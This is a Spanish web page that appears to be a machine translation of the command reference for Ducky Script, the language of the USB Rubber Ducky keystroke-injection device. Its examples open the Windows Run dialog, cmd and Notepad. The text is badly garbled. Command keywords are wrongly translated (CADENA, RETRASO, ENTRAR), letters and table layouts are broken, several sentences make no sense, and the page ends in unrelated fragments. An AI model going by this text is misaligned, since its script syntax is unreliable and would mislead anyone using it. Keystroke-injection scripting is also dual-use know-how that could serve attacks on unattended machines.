No podra ser ms sencillo.
Ventanas:
Utilice un editor hexadecimal libre como:
http://mh-nexus.de/en/hxd/
http://www.chmaas.handshake.de/delphi/freeware/xvi32/xvi32.htm
http://www.wxhexeditor.org

Apndice: Ducky Guin API


REM
Similar al comando REM en Basic y otros lenguajes, no se procesarn las lneas
que comienzan con REM. REM es un comentario. Comando ^ ^ | REM |
REM Las siguientes tres lneas de ejecutar una lnea de comandos en Windows
GUI r
Cmd STRING
ENTRAR
DEFAULT_DELAY o DEFAULTDELAY
DEFAULT_DELAY o DEFAULTDELAY se utiliza para definir cunto tiempo (en
milisegundos * 10) se debe esperar entre cada comando posterior.
DEFAULT_DELAY debe ser emitido al comienzo de la secuencia de comandos
patito y es opcional. Si no se especifica la DEFAULT_DELAY se traducir en ms
rpida ejecucin de scripts ducky. Este comando es principalmente til para
depurar. ^ ^ Comando Parmetros ^ | DEFAULT_DELAY | // n * 10 ms // | |
DEFAULTDELAY | // n * 10 ms // |
DEFAULT_DELAY 10
REM retrasa 100 ms entre cada secuencia de comandos subsiguiente
RETRASO
RETRASO crea una pausa momentnea en el guin patito. Esto es muy til para
la creacin de un momento de pausa entre los comandos secuenciales que
pueden tener el equipo de destino algn tiempo para procesar. RETRASO tiempo
se especifica en milisegundos entre 1 y 10000. comandos de retardo mltiple se
puede utilizar para crear retrasos largos. ^ ^ Comando Parmetros ^ | RETRASO
| // n * 10 ms // |
RETRASO 50
REM esperar 500ms antes de continuar con el siguiente comando.
CADENA
CADENA procesa el siguiente texto teniendo especial cuidado de autocorreccin.
CADENA puede aceptar uno o varios caracteres. ^ ^ Comando Parmetros ^ |
CUERDAS | a ... z A ... Z 0..9 ...) `~ + = _-" '!; <,>. ? / \ Y tubos |
GUI r
RETRASO 50
Notepad.exe CADENA
ENTRAR
RETRASO 100
CADENA Hello World!
WINDOWS o GUI
Emula Windows-Key, a veces conocido como la tecla Sper. ^ ^ Parmetros
opcionales Comando ^ | GUI | Individual Char | | VENTANAS | Individual Char |
GUI r
REM celebrar la r de Windows-llave y prensa, en los sistemas de Windows que
aparece en el men Ejecutar.
MENU o APP
Emula la tecla App, a veces conocido como la tecla de men o la tecla de men de
contexto. En los sistemas Windows es similar a la combinacin de teclas SHIFT
F10, produciendo el men similar a un clic derecho. Comando ^ ^ | APP | | MENU |

GUI d
MEN
CADENA v
CADENA d
// Cambiar al escritorio, tire hacia arriba de men contextual y elegir acciones V,
despus cambia d muestran los iconos del escritorio de Windows //
SHIFT
A diferencia de Bloq Mays, control de travesa para fresco, el comando SHIFT se
puede utilizar cuando se navega campos para seleccionar texto, entre otras
funciones. Comando ^ ^ ^ Opcional Parmetro | SHIFT | DELETE, HOME,
INSERT, RePg, AvPg, VENTANAS, GUI, UPARROW, Downarrow, FLECHA
IZQUIERDA, FLECHA DERECHA, TAB |
INSERT SHIFT
REM es pasta para la mayora de sistemas operativos
ALT
Encontrado a la izquierda de la tecla de espacio en la mayora de los teclados, la
tecla ALT es fundamental en muchas de las operaciones de automatizacin. ALT
es envidioso de CONTROL. Comando ^ ^ ^ Opcional Parmetro | ALT | FIN, ESC,
ESC, F1 ... F12, individual Char, ESPACIO, TAB |
GUI r
RETRASO 50
Notepad.exe CADENA
ENTRAR
RETRASO 100
CADENA Hello World
ALT f
CADENA s
REM alt-f se detiene en el men Archivo y s salva. Esta dos combo de teclas es la
razn por la ALT es celoso de leetness de CONTROL y CTRL + S
CONTROL o CTRL
El rey de clave combos, CONTROL es todo poderoso. Comando ^ ^ ^ Parmetros
opcionales | CONTROL | DESCANSO, PAUSA, F1 ... F12, ESC, ESC, individual
Char | | CTRL | DESCANSO, PAUSA, F1 ... F12, ESC, ESC, individual Char |
ESCAPE DE CONTROL
REM esto es equivalente a la clave GUI en Windows
Teclas de flecha
Comando ^ ^ | Downarrow o DOWN | | FLECHA IZQUIERDA o A LA IZQUIERDA | |
FLECHA DERECHA o A LA DERECHA | | UPARROW o UP |
Comandos extendidas
Comando ^ ^ ^ Notas | INTER o PAUSA | Para el combo infame CTRL RECESO | |
BloqMays | Control de crucero para enfriar. Alterna | | DELETE | | | FIN | Cundo
es que alguna vez | | ESC o ESCAPE | Puede nunca | | HOME | No hay lugar
como el | | INSERT | | | BLOQ NUM | Alterna bloqueo numrico | | RePg | | |
AvPg | |

Ejemplo 1:

...

Software Windows

acciones?

La solucin es simple.

DE ACUERDO.
Comando:

También podría gustarte